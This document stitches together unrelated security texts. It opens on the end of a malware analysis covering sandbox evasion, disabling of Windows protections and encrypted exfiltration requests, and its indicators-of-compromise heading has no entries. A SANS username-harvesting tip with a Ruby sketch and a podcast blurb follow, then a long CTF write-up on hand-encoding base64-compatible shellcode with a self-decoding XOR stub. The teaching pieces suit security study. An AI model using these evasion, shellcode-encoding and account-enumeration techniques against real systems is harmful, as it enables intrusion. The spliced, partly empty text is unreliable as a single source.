Let's investigate a little better what these modules do. The Anti module tries to figure out whether the sample has landed in a controlled (emulated and/or simulated) environment, in order to change its behaviour. The following image shows some of the performed checks: the sample tries to identify Sandboxie, Fiddler and Wireshark so that it can dynamically change its own behaviour.

Stage 3: evasion checks

The Service module tries to spawn a Windows service and to disable many Windows features, including (but not limited to) EnableLUA, DisableCMD, DisableTaskMgr, etc. The following image shows some of the described actions.

Stage 3: Disabling Windows "Protections"
Finally, the RunPE module decrypts a further encrypted, embedded resource and tries to run it. The following images show the decryption loop followed by the decrypted payload.

Stage 3: Decryption Loop

Stage 3: decrypted payload

On line 253 the third stage decrypts the resource and executes it. In the above picture you can see the decrypted sequence 0x4D, 0x5A, 0x90, which happens to be yet another Windows PE. Let's call it Stage 4. The new stage appears to be a classic PE file written in C++; we'll need a debugger to get into it. By analysing its dynamic behaviour (thanks to IDA Pro) it has been easy to catch the dropped files and to understand how the sample uses them. The following image shows two dropped files (.nls and .bat) being saved to the hard drive after the Stage 4 call.

Stage 4: dropping files (.nls and .bat)
The resulting .bat file tries to execute (through cmd.exe /c) %1 with the parameter %2, as shown in the next picture. If the file to be executed does not exist on disk, it deletes the original file (itself) as well.

Stage 4: file execution

%1 is an additional dropped PE file, while %2 is a "random" value (a key? a unique id?).

Stage 4: Interesting "keys" passed to the .bat file.
Once the sample runs, it performs external requests such as the following, exfiltrating encrypted information:

GET /htue503dt/images/uAsMyeumP3uQ/LlAgNzHCWo8/XespJetlxPFFIY/VWK7lnAXnqTCYVX_2BL6O/vcjvx6b8nqcXQKN3/J6ga_2FN2zw6Dv6/r5EUJoPCeuwDIczvFL/kxAqCE1du/yzpHeaF3r0pY4KFUCyu0/jDoN_2BArkLgWaG/fFDxP.gif HTTP/1.1

POST /htue503dt/images/YtDKOb7fgj_2B10L/MN3zDY9V3IPW9vr/JSboSiHV4TAM_2BoCU/LocIRD_2B/MEDnB2QG_2Bf2dbtio8H/_2BLdLdN21RuRQj3xt2/SDWwjjE2JeHnPcsubnBWMG/NJUCRhlTnTa9c/5Dzpqg92/AypuGS6etix2MQvl1C8/V.bmp HTTP/1.1

It is interesting to observe the sample's complexity and how widely it is currently spread across Italian organisations. Also interesting (at least from my personal point of view) is how false flag attacks are developed in order to confuse attack attribution, which is nowadays a huge technical issue. Unfortunately, with the information I have today it is not possible to attribute this attack: the dropper has Russian strings in it, one of the payloads has "oriental characters" in it, but I am not able to say whether the attack is the result of a "joint venture" between Russia and China, or something hybrid, or whether one piece was borrowed or acquired from one actor by another, etc. For sure it's not what it appears to be :D!

Indicators of Compromise:
Below are some of the most interesting indicators of compromise.

Simple Username Harvesting (from SANS SEC542)

Go to a web site that requires a login. Put in any username with any password. Did the page come back with both the User and Password fields blank? Now put YOUR username in, but with some password you make up. Does the form come back with your username in the User field and nothing in the Password field? If so, here's what you just discovered. The developer is making his form more efficient by not hashing and testing the password to see if it's correct unless the username is valid. If the username IS valid, he populates the User field with it and checks the password. If the password is incorrect, he only clears the Password field so you can retry your password. You just discovered a crude form of username harvesting. Try different usernames and if they remain in the User field, that's a valid account on the server. I know, that would take a lot of time to do it that way. That's why hackers write automated tools.
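The manual test above is easy to turn into code. Here's a minimal sketch of just the classification logic; the field names and sample responses are hypothetical, and a real tool would drive HTTP requests and parse the returned form.

```ruby
# If the server echoes a submitted username back into the form, the
# account likely exists; if both fields come back blank, it likely
# doesn't. Field names and sample responses are hypothetical.
def username_valid?(submitted, returned_fields)
  returned_fields['username'] == submitted
end

responses = {
  'alice' => { 'username' => 'alice', 'password' => '' },  # echoed back
  'zzzzz' => { 'username' => '',      'password' => '' },  # blanked out
}

harvested = responses.select { |user, form| username_valid?(user, form) }.keys
puts harvested.inspect
# => ["alice"]
```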

Hack Naked News #129 – June 13, 2017

How to delete an entire company, GameStop suffers a breach, Macs do get viruses, Docker released LinuxKit, and more. Jason Wood of Paladin Security joins us to discuss the military beefing up their cybersecurity reserve on this episode of Hack Naked News! Full Show Notes: for all the latest episodes!

Solving b-64-b-tuff: writing base64 and alphanumeric shellcode

Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There's an easy solution - using an alphanumeric encoder - but what's the fun in that? (Also, I didn't think of it :) ). I'm going to cover base64, but these exact same principles apply to alphanumeric - there's absolutely no reason you couldn't change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we're going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I'll also post a link to a tool I wrote to automate this.

I can't promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)

Intro to Shellcode

I don't want to dwell too much on the basics, so I highly recommend reading the primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data would be encoded into base64, then the base64 string would be run as if it were machine code. That means that your machine code had to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign ("=") or two on the end, but that's not really useful.

We're going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it'd be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the command line, a tool that we'll see used throughout this blog, but I didn't keep that code. Instead, I'm going to use the Crabstone disassembler, which provides Ruby bindings for Capstone:

require 'crabstone'

# Our set of known characters
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

# Create an instance of the Crabstone Disassembler for 32-bit x86
cs = Crabstone::Disassembler.new(Crabstone::ARCH_X86, Crabstone::MODE_32)

# Get every 2-character combination
SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Pad it out pretty far with obvious no-op-ish instructions
    data = c1 + c2 + ("A" * 14)

    # Disassemble it and get the first instruction (we only care about the
    # shortest instructions we can form)
    instruction = cs.disasm(data, 0)[0]

    puts "%s     %s %s" % [instruction.bytes.map { |b| '%02x' % b }.join(' '),
                           instruction.mnemonic, instruction.op_str]
  end
end

I'd probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that's easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that's useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn't be useful, but that I didn't want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls ("int 0x80" in assembly or "\xcd\x80" in machine code; we'll see how that winds up being the most problematic piece!).

For the purposes of this blog, we're going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace.

Here's the shellcode we're going to be working with:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

We'll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585)                        = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We're going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let's take a quick look at a simple character restriction: NUL bytes. It's commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It's usually pretty straightforward to get rid of NUL bytes by just looking at where they appear and fixing them; it's almost always caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al, the low byte of eax, is 8 bits):

xor eax, eax ; Set eax to 0
inc eax ; Increment eax (set it to 1) - could also use "mov al, 1", but that's one byte longer
mov ebx, 0x41414141 ; Set ebx to the usual value, no NUL bytes here
int 0x80 ; Perform the syscall

We can prove this works, as well (I'm going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n'> file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  31 c0 40 bb 41 41 41 41  cd 80                    |1.@.AAAA..|


Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let's look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren't so close: the only line that's actually compatible is "inc eax". I guess we can start the long journey!

Let's start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

  • 35 ?? ?? ?? ?? xor eax,0x????????
  • 68 ?? ?? ?? ?? push dword 0x????????
  • 58 pop eax

Let's start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we're pushing 0, we end up with a NUL byte. So let's push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000  68 41 41 41 41 58                                 |hAAAAX|

Not only is it all Base64 compatible now, it also spells "hAAAAX", which is a fun coincidence. :)

The problem is, eax doesn't end up as 0, it's 0x41414141. You can verify this by adding "int 3" at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you're following along, I'm using it constantly to verify my code snippets, but I'll only show it when the values are important):

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32

push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410008 in ?? ()
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don't like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let's do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41                 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let's look at why!

We'll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
      end
    end
  end

  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil
end

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])
end

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>

Basically, we can encode any value that doesn't have the most-significant bit set (ie, anything under 0x80). That's going to be a problem that we'll deal with much, much later.
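You can double-check that claim exhaustively: XORing pairs drawn from the base64 alphabet reaches every byte below 0x80 and nothing above it. A quick sketch:

```ruby
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Every byte reachable as the XOR of two alphabet characters
reachable = SET.bytes.product(SET.bytes).map { |b1, b2| b1 ^ b2 }.uniq.sort

puts '0x%02x .. 0x%02x (%d values)' % [reachable.first, reachable.last, reachable.length]
# => 0x00 .. 0x7f (128 values)
```

Since every alphabet byte has its most significant bit clear, so does every XOR of two of them - hence the hard 0x80 ceiling.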

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Convert the integer into a string (pack()), then into the four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Convert both sets of xor values back into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),
  ]

  # Note: I comment these out for many of the examples, simply for brevity
  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('0x%08x' % (result[0] ^ result[1]))

  return result
end

This function takes a single 32-bit value and it outputs the two xor values (note that this won't work when the most significant bit is set.. stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:


irb(main):041:0> get_xor_values_32(0x00000001)

=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it's base-64-compatible; I believe in doing this, because every once in a while an instruction like "inc eax" (which becomes '@') will slip in when I'm not paying attention:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41                 |hBAAAX5CAAA|

We'll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It's the most fundamental building block of this project!
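Since we'll repeat that pattern so often, it's worth automating. Here's a sketch that emits the raw bytes for push (value) / pop eax / xor eax, (other value); find_bytes is re-declared so the snippet stands alone, and like before it only works when every byte of the target value is under 0x80:

```ruby
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

# Find two alphabet bytes whose XOR is b (only possible for b < 0x80)
def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      return [b1, b2] if (b1 ^ b2) == b
    end
  end
  nil
end

# Machine code for: push imm32 / pop eax / xor eax, imm32 -- leaving
# 'desired' in eax while using only base64-compatible bytes
def encode_set_eax(desired)
  pairs = [desired].pack('N').bytes.map { |b| find_bytes(b) }
  first  = pairs.map { |p| p[0] }.pack('C4')   # push immediate (big-endian order)
  second = pairs.map { |p| p[1] }.pack('C4')   # xor immediate
  "\x68" + first.reverse + "\x58" + "\x35" + second.reverse
end

puts encode_set_eax(0x00000001)
# => hBAAAX5CAAA
```

The .reverse calls flip the big-endian byte order into the little-endian immediates x86 expects; encode_set_eax(0x00000001) reproduces exactly the hBAAAX5CAAA sequence from the hexdump above.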

Setting other registers

Sadly, unless I missed something, there's no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don't have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

  • 58 pop eax
  • 59 pop ecx
  • 5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143 ; eax -> 1
push eax
pop ecx ; ecx -> 1

Then verify the base64-ness:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 59           |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 5b           |hBAAAX5CAAAP[|

Note the "[" at the end - that's not in our character set! So we're pretty much limited to using eax, ecx, and edx for most things.

But wait, there's more! We do, however, have access to popad. The popad instruction pops eight dwords off the stack into the general-purpose registers (the value destined for esp is discarded). It's a bit of a scorched-earth method, though, because it overwrites every register. We're going to use it at the start of our code to set all the registers to a known value.

Let's try to convert our exit shellcode from earlier:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Into something that's base-64 friendly:

; We'll start by populating the stack with 0x41414141's
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141

; Then popad to set all the registers to 0x41414141

; Then set eax to 1
push 0x41414142
pop eax
xor eax, 0x41414143

; Finally, do our syscall (as usual, we're going to ignore the fact that the syscall isn't base64 compatible)
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000  68 41 41 41 41 68 41 41  41 41 68 41 41 41 41 68  |hAAAAhAAAAhAAAAh|
00000010  41 41 41 41 68 41 41 41  41 68 41 41 41 41 68 41  |AAAAhAAAAhAAAAhA|
00000020  41 41 41 68 41 41 41 41  61 68 42 41 41 41 58 35  |AAAhAAAAahBAAAX5|
00000030  43 41 41 41 cd 80                                 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585)                        = ?

Encoding the actual code

You've probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it's our working register). And what if you need an instruction (like add, or shift) that isn't available? Do we just simulate it?

As I'm sure you've noticed, the machine code is just a bunch of bytes. What's stopping us from simply encoding the machine code rather than just values?

Let's take our original example of an exit again:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Because 'mov' assembles to 0xb8XXXXXX, I don't want to deal with that yet (the most-significant bit is set). So let's change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:

6a 01 58 68 41 41 41 41 5b


Let's pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with 'A', because it's as good a character as any):

6a 01 58 68 41 41 41 41 5b 41 41 41


then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

  • 6a 01 58 68 -> 0x6858016a
  • 41 41 41 41 -> 0x41414141
  • 5b 41 41 41 -> 0x4141415b
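That chunking is a one-liner in Ruby, since unpack('V*') reads 32-bit little-endian values:

```ruby
# push byte 1 / pop eax / push dword 0x41414141 / pop ebx,
# padded with 'A' to a multiple of 4 bytes
shellcode = "\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

# Break into 4-byte little-endian dwords
chunks = shellcode.unpack('V*')
puts chunks.map { |c| '0x%08x' % c }.join(', ')
# => 0x6858016a, 0x41414141, 0x4141415b
```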

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let's start our decoder by simply calculating each of these values in eax, just to prove that they're all base64-compatible (note that we are simply discarding the values in this example, we aren't doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b ; 0x6858016a

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b ; 0x41414141

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39 ; 0x4141415b

Which assembles to:

$ hexdump -Cv file
00000000  68 41 42 61 43 58 35 2b  43 39 2b 68 6a 6a 6a 6a  |hABaCX5+C9+hjjjj|
00000010  58 35 2b 2b 2b 2b 68 62  6a 6a 6a 58 35 39 2b 2b  |X5++++hbjjjX59++|
00000020  2b                                                |+|

Looking good so far!

Decoder stub

Okay, we've proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We'll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let's look back at the list of available instructions! After some searching, I found one that's promising:

3151??            xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the "0x??" value has to also be a base64 character, we'll follow our trend and use [ecx+0x41], which gives us:

315141            xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that's basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let's start by looking at the steps involved:

  • Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
  • Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
  • For each 32-bit pair in the encoded shellcode...
    • Load the other half of the xor pair into edx
    • Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
    • Increment ecx to point at the next value
    • Repeat for the full payload
  • Run the newly decoded payload

For the sake of our sanity, we're going to make some assumptions in the code: first, our code is loaded to the address 0x41410000 (which it is, for this challenge). Second, the decoder stub is exactly 0x141 bytes long (we will pad it to get there). Either of these can be easily worked around, but it's not necessary to do the extra work in order to grok the decoder concept.

Recall that for our sys_exit shellcode, the xor pairs we determined were: 0x43614241 ^ 0x2b39432b, 0x6a6a6a6a ^ 0x2b2b2b2b, and 0x6a6a6a62 ^ 0x2b2b2b39.
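Before committing the decoder to assembly, the decode loop can be sanity-checked in Ruby: XOR each in-memory dword (the second halves) against the corresponding edx value (the first halves), then read the memory back as little-endian bytes:

```ruby
# Second halves of the xor pairs, as stored in memory after the stub
encoded = [0x2b39432b, 0x2b2b2b2b, 0x2b2b2b39]
# First halves, loaded into edx one at a time by the decoder stub
keys    = [0x43614241, 0x6a6a6a6a, 0x6a6a6a62]

# Simulate "xor [ecx+0x41], edx" per dword, then dump memory as bytes
decoded = encoded.zip(keys).map { |e, k| [e ^ k].pack('V') }.join
puts decoded.bytes.map { |b| '%02x' % b }.join(' ')
# => 6a 01 58 68 41 41 41 41 5b 41 41 41
```

Those are exactly the bytes of our padded sys_exit shellcode, so the decode logic checks out.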

Here's the code:

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; eax -> 0x41410100
push eax
pop ecx ; ecx -> 0x41410100

; Set edx to the first value in the first xor pair
push 0x43614241
pop edx

; xor it with the second value in the first xor pair (which is at ecx + 0x41)
xor [ecx+0x41], edx

; Move ecx to the next 32-bit value
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the second xor pair
push 0x6a6a6a6a
pop edx

; xor + increment ecx again
xor [ecx+0x41], edx
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the third and final xor pair, and xor it
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; At this point, I assembled the code and counted the bytes; we have exactly 0x30 bytes of code so far. That means to get our encoded shellcode to exactly 0x141 bytes after the start, we need 0x111 bytes of padding ('A' translates to inc ecx, so it's effectively a no-op because the encoded shellcode doesn't care what ecx starts as):
times 0x111 db 'A'

; Now, the second halves of our xor pairs; this is what gets modified in-place
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; And finally, we're going to cheat and just do a syscall that's non-base64-compatible
int 0x80

All right! Here's what it gives us; note that other than the syscall at the end (we'll get to that, I promise!), it's all base64:

$ hexdump -Cv file
00000000  68 41 42 6a 6a 58 35 41  43 2b 2b 50 59 68 41 42  |hABjjX5AC++PYhAB|
00000010  61 43 5a 31 51 41 41 41  41 41 68 6a 6a 6a 6a 5a  |aCZ1QAAAAAhjjjjZ|
00000020  31 51 41 41 41 41 41 68  62 6a 6a 6a 5a 31 51 41  |1QAAAAAhbjjjZ1QA|
00000030  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000040  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000050  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000090  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000100  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000110  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000120  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 2b 43 39 2b 2b 2b 2b  2b 39 2b 2b 2b cd 80     |A+C9+++++9+++..|

To run this, we have to patch run_raw_code.c to load the code to the correct address:

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){

-  void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+  void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
   printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);

   FILE *file = fopen(argv[1], "rb");

You'll also have to compile it in 32-bit mode:

$ gcc -m32 -o run_raw_code run_raw_code.c

Once that's done, give 'er a shot:

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585)                        = ?

We did it, team!

If we want to actually inspect the code, we can change the very last padding 'A' into 0xcc (aka, int 3, or a SIGTRAP):

$ diff -u file.asm file-trap.asm
--- file.asm    2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm       2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

And run it with corefiles enabled:

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410141 in ?? ()
(gdb) x/10i $eip
=> 0x41410141:  push   0x1
   0x41410143:  pop    eax
   0x41410144:  push   0x41414141
   0x41410149:  pop    ebx
   0x4141014a:  inc    ecx
   0x4141014b:  inc    ecx
   0x4141014c:  inc    ecx
   0x4141014d:  int    0x80
   0x4141014f:  add    BYTE PTR [eax],al
   0x41410151:  add    BYTE PTR [eax],al

As you can see, our original shellcode is properly decoded! (The inc ecx instructions you're seeing are our padding.)

The decoder stub and encoded shellcode can quite easily be generated programmatically rather than by hand, which is extremely error prone. It took me four tries to get this right: I messed up the start address, compiled run_raw_code in 64-bit mode, and got the endianness backwards before it finally worked. That doesn't sound so bad, except that each mistake meant re-writing part of this section and re-running most of the commands to get the proper output. :)

That pesky most-significant-bit

So, I've been avoiding this, because I don't think I solved it in a very elegant way. But, my solution works, so I guess that's something. :)

As usual, we start by looking at our set of available instructions to see what we can use to set the most significant bit (let's start calling it the "MSB" to save my fingers).

Unfortunately, the easy stuff can't help us; xor can only set it if it's already set somewhere, we don't have any shift instructions, inc would take forever, and the subtract and multiply instructions could probably work, but it would be tricky.

Let's start with a simple case: can we set edx to 0x80?

